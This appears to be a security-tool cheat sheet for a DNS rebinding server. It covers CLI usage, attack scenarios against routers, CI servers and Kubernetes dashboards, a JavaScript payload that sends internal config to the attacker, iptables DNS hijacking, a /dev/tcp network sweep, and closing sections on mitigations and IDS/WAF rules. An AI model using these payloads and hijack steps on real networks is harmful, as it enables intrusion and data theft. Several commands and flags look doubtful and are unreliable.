Rebind
Overview
Section titled “Overview”Rebind is a specialized security testing tool for demonstrating DNS rebinding vulnerabilities. DNS rebinding is a client-side attack technique where an attacker tricks a victim’s browser into accessing an internal network resource by manipulating DNS responses. Used by security professionals for authorized penetration testing, vulnerability assessment, and defensive security research.
Installation
Section titled “Installation”Debian/Ubuntu
Section titled “Debian/Ubuntu”sudo apt-get update
sudo apt-get install rebindKali Linux (Pre-installed)
Section titled “Kali Linux (Pre-installed)”which rebind
rebind --versionFrom Source
Section titled “From Source”git clone https://github.com/iceadzcom/rebind.git
cd rebind
make
sudo make installVerify Installation
Section titled “Verify Installation”rebind -h
rebind --versionBasic Syntax
Section titled “Basic Syntax”rebind [options] [target]
rebind -h # Help menu
rebind --version # Version info
rebind -l <ip> # Listen on IP address
rebind -p <port> # Specify port (default: 53)Essential Commands
Section titled “Essential Commands”| Command | Purpose |
|---|---|
rebind -l 127.0.0.1 | Listen on localhost |
rebind -l 0.0.0.0 -p 5353 | Listen on all interfaces, custom port |
rebind --domain example.com | Set target domain |
rebind --ip 192.168.1.100 | Specify rebind target IP |
rebind --delay 2 | Delay between DNS responses (seconds) |
rebind --ttl 0 | Set TTL (Time-To-Live) value |
rebind --records A,AAAA | Specify record types |
rebind -v | Verbose output |
rebind --log file.log | Log DNS queries |
rebind --config config.yaml | Load configuration file |
DNS Rebinding Concepts
Section titled “DNS Rebinding Concepts”Attack Flow
Section titled “Attack Flow”1. Attacker owns malicious domain: attacker.com
2. Victim visits: http://attacker.com/payload
3. JavaScript on page queries: internal.local
4. First DNS response: returns attacker's IP (domain hosted)
5. Browser makes connection to attacker's server
6. Second DNS response: returns internal IP (192.168.1.1)
7. Browser repeats request, now to internal IP (same origin!)
8. Access internal service: router admin, internal APIs, etc.Configuration Setup
Section titled “Configuration Setup”Basic Configuration
Section titled “Basic Configuration”rebind -l 127.0.0.1 -p 53Custom Port (if 53 restricted)
Section titled “Custom Port (if 53 restricted)”rebind -l 192.168.1.100 -p 5353Configuration File
Section titled “Configuration File”# rebind.yaml
listen:
address: 0.0.0.0
port: 53
domain:
name: vulnerable.local
ttl: 0
rebind:
external_ip: 203.0.113.1
internal_ip: 192.168.1.1
delay: 2
logging:
verbose: true
logfile: /var/log/rebind.logCommand Examples
Section titled “Command Examples”Listen on Default Interface
Section titled “Listen on Default Interface”rebind -l 192.168.1.100Multiple Domain Rebinding
Section titled “Multiple Domain Rebinding”rebind -l 0.0.0.0 --domain attacker.com --domain internal.localCustom TTL and Delay
Section titled “Custom TTL and Delay”rebind -l 127.0.0.1 --ttl 0 --delay 1Verbose Logging
Section titled “Verbose Logging”rebind -l 192.168.1.100 -v --log /tmp/rebind.logHigh-Precision Timing
Section titled “High-Precision Timing”rebind -l 0.0.0.0 --delay 0.5 --ttl 1DNS Response Manipulation
Section titled “DNS Response Manipulation”Return Different IPs Alternately
Section titled “Return Different IPs Alternately”# First query: external IP
# Second query: internal IP
rebind -l 192.168.1.100 \
--external-ip 203.0.113.1 \
--internal-ip 192.168.1.1Wildcard Domain Responses
Section titled “Wildcard Domain Responses”# All subdomains return rebind IP
rebind -l 192.168.1.100 --wildcardRound-Robin DNS
Section titled “Round-Robin DNS”rebind -l 192.168.1.100 \
--ip 192.168.1.50 \
--ip 192.168.1.51 \
--ip 192.168.1.52Client Configuration
Section titled “Client Configuration”Redirect System DNS
Section titled “Redirect System DNS”# For testing, redirect to rebind server
echo "nameserver 192.168.1.100" | sudo tee /etc/resolv.conf.d/rebind
# Or use dig to test:
dig @192.168.1.100 vulnerable.local
dig @192.168.1.100 vulnerable.local +shortTest DNS Resolution
Section titled “Test DNS Resolution”# Verify DNS responses
nslookup vulnerable.local 192.168.1.100
dig @192.168.1.100 vulnerable.local
host vulnerable.local 192.168.1.100Attack Scenarios
Section titled “Attack Scenarios”Router Admin Access
Section titled “Router Admin Access”# 1. Start rebind server targeting 192.168.1.1
rebind -l 192.168.1.100 \
--domain vulnerable.local \
--external-ip 203.0.113.1 \
--internal-ip 192.168.1.1
# 2. Redirect DNS to attacker's rebind server
# 3. Victim visits: http://vulnerable.local/admin
# 4. JavaScript rebinds to 192.168.1.1 (router admin)
# 5. Can access router config without authenticationInternal API Access
Section titled “Internal API Access”# Rebind to internal API server
rebind -l 192.168.1.100 \
--domain api.internal \
--external-ip 203.0.113.1 \
--internal-ip 192.168.1.50
# Access internal APIs from browser context
curl http://api.internal/internal-serviceDatabase Server Exposure
Section titled “Database Server Exposure”# Expose internal database to browser
rebind -l 192.168.1.100 \
--domain dbserver.internal \
--external-ip 203.0.113.1 \
--internal-ip 192.168.1.200 \
--port 5432JavaScript Exploitation
Section titled “JavaScript Exploitation”Rebinding Payload
Section titled “Rebinding Payload”// Victim's browser executes this
fetch('http://vulnerable.local/admin')
.then(r => r.text())
.then(html => {
// First request goes to attacker
// Browser caches: vulnerable.local = 203.0.113.1
console.log('Attacker sees request');
});
// After DNS rebind occurs...
setTimeout(() => {
fetch('http://vulnerable.local/config')
.then(r => r.json())
.then(config => {
// Second request goes to internal IP (192.168.1.1)
// Due to DNS rebinding vulnerability
sendToAttacker(config);
});
}, 2000);CORS Bypass Via Rebinding
Section titled “CORS Bypass Via Rebinding”// Normally blocked by CORS policy
// Rebinding makes it appear same-origin
const req = new XMLHttpRequest();
req.open('GET', 'http://router-admin.local/config');
req.onload = () => {
// Access internal data through rebinding
console.log(req.responseText);
};
req.send();Monitoring and Logging
Section titled “Monitoring and Logging”Enable Verbose Logging
Section titled “Enable Verbose Logging”rebind -l 192.168.1.100 -v 2>&1 | tee rebind.logMonitor DNS Queries in Real-Time
Section titled “Monitor DNS Queries in Real-Time”# Terminal 1: Start rebind
rebind -l 192.168.1.100 -v
# Terminal 2: Watch queries
tail -f rebind.log | grep "QUERY\|RESPONSE"Tcpdump Analysis
Section titled “Tcpdump Analysis”# Capture DNS traffic
sudo tcpdump -i eth0 'udp port 53' -A
# Or filter for specific domain
sudo tcpdump -i eth0 'udp port 53 and (host attacker.com)' -AAdvanced Techniques
Section titled “Advanced Techniques”Chained Rebinding
Section titled “Chained Rebinding”# Rebind multiple times for complex attacks
rebind -l 192.168.1.100 \
--chain \
--ips 203.0.113.1,192.168.1.1,192.168.1.50Timing-Based Rebinding
Section titled “Timing-Based Rebinding”# Precise timing for connection reuse
rebind -l 192.168.1.100 \
--delay 0.1 \
--ttl 1 \
--timing-preciseHTTP/HTTPS Interception
Section titled “HTTP/HTTPS Interception”# Rebind for both HTTP and HTTPS
rebind -l 192.168.1.100 \
--http --https \
--certificate cert.pem \
--key key.pemDefensive Testing
Section titled “Defensive Testing”Test Router Vulnerability
Section titled “Test Router Vulnerability”# Check if router blocks internal DNS rebinding
rebind -l 192.168.1.100 --domain router-admin.local
# Try to access: http://router-admin.local/
# If successful = vulnerableApplication CORS Testing
Section titled “Application CORS Testing”# Test if application validates origin properly
rebind -l 192.168.1.100 \
--domain vulnerable-app.local \
--internal-ip 192.168.1.50
# Check if app accepts requests from rebind domainMicroservice Exposure
Section titled “Microservice Exposure”# Identify exposed internal services
rebind -l 192.168.1.100 --scan-network 192.168.1.0/24Common Targets
Section titled “Common Targets”Home Router Admin
Section titled “Home Router Admin”# Gateway: 192.168.1.1
rebind -l 192.168.1.100 \
--domain gateway.local \
--internal-ip 192.168.1.1 \
--port 80Local Jenkins/CI
Section titled “Local Jenkins/CI”# Jenkins typically on 8080
rebind -l 192.168.1.100 \
--domain jenkins.local \
--internal-ip 192.168.1.50 \
--port 8080Kubernetes Dashboard
Section titled “Kubernetes Dashboard”# K8s dashboard on 10.0.0.1:8001
rebind -l 192.168.1.100 \
--domain k8s-dashboard.local \
--internal-ip 10.0.0.1 \
--port 8001Docker Registry
Section titled “Docker Registry”# Private registry on 5000
rebind -l 192.168.1.100 \
--domain registry.local \
--internal-ip 192.168.1.200 \
--port 5000Network Configuration
Section titled “Network Configuration”Iptables Forwarding
Section titled “Iptables Forwarding”# Forward DNS queries to rebind
sudo iptables -t nat -A PREROUTING \
-p udp --dport 53 \
-j DNAT --to-destination 192.168.1.100:53
# Or for testing:
sudo iptables -t nat -A PREROUTING \
-p udp --dport 5353 \
-j DNAT --to-destination 192.168.1.100:5353Redirect DNS (Alternative)
Section titled “Redirect DNS (Alternative)”# Using dnsmasq
echo "address=/vulnerable.local/192.168.1.100" | sudo tee /etc/dnsmasq.conf
sudo systemctl restart dnsmasqBatch Testing
Section titled “Batch Testing”Test Multiple Domains
Section titled “Test Multiple Domains”#!/bin/bash
targets=(
"router-admin.local:192.168.1.1"
"jenkins.local:192.168.1.50"
"registry.local:192.168.1.200"
)
for target in "${targets[@]}"; do
domain=$(echo $target | cut -d: -f1)
ip=$(echo $target | cut -d: -f2)
echo "Testing: $domain -> $ip"
rebind -l 192.168.1.100 \
--domain "$domain" \
--internal-ip "$ip" \
--delay 2 &
sleep 5
killall rebind
doneAutomated Scanning
Section titled “Automated Scanning”#!/bin/bash
# Scan network for rebinding-vulnerable services
for ip in 192.168.1.{1..254}; do
timeout 1 bash -c "echo > /dev/tcp/$ip/80" 2>/dev/null && \
echo "Host $ip:80 open - testing rebind..."
doneTroubleshooting
Section titled “Troubleshooting”Port 53 Access Denied
Section titled “Port 53 Access Denied”# Run with sudo for port 53
sudo rebind -l 0.0.0.0 -p 53
# Or use unprivileged port
rebind -l 0.0.0.0 -p 5353DNS Not Resolving
Section titled “DNS Not Resolving”# Verify DNS server is running
sudo netstat -ulpn | grep 53
# Test query
dig @127.0.0.1 vulnerable.local
# Check firewall
sudo ufw allow 53/udpRebinding Not Triggering
Section titled “Rebinding Not Triggering”# Check TTL settings
rebind -l 192.168.1.100 --ttl 0
# Verify timing
rebind -l 192.168.1.100 --delay 1 --ttl 1 -v
# Monitor with tcpdump
sudo tcpdump -i eth0 'udp port 53' -ABest Practices
Section titled “Best Practices”- Obtain Authorization - Only test systems you own or have written permission to test
- Document Network - Map internal network topology before testing
- Isolate Testing - Conduct testing in controlled lab environments
- Log All Activity - Enable verbose logging for incident response review
- Verify Defenses - Confirm mitigation before declaring success
- Clean Up - Remove all rebind configurations after testing
- Report Findings - Document vulnerable systems and remediation
- Understand Risks - DNS rebinding can disrupt network services
Mitigation Strategies
Section titled “Mitigation Strategies”Router-Level Defenses
Section titled “Router-Level Defenses”# Configure router DNS guards
# Set DNS rebinding protection: ON
# Block local DNS names: ENABLEDApplication-Level Defenses
Section titled “Application-Level Defenses”// Validate origin header
if (req.headers.origin !== ALLOWED_ORIGIN) {
return res.status(403).json({error: 'Invalid origin'});
}
// Validate Host header
if (req.hostname !== 'internal-api.local') {
return res.status(403).json({error: 'Invalid host'});
}Browser Security
Section titled “Browser Security”// Check document.domain for rebinding
if (document.domain !== TRUSTED_DOMAIN) {
throw new Error('Domain validation failed');
}Real-World Detection
Section titled “Real-World Detection”IDS Signature
Section titled “IDS Signature”# Look for multiple DNS responses to same domain
alert dns any any -> any any (
msg:"DNS Rebinding Attack";
dns.query;
content:"vulnerable.local";
threshold: type different, track by_src, count 2, seconds 5;
)Web Application Firewall
Section titled “Web Application Firewall”# Block suspicious origin headers
SecRule REQUEST_HEADERS:Origin "^http://.*\.local" \
"id:1001,phase:2,deny,status:403"Additional Resources
Section titled “Additional Resources”- DNS Rebinding Research: https://en.wikipedia.org/wiki/DNS_rebinding
- OWASP DNS Rebinding: https://owasp.org/www-community/attacks/DNS_Rebinding
- Rebind GitHub: https://github.com/iceadzcom/rebind
- Browser Security Docs: https://developer.mozilla.org/en-US/docs/Web/Security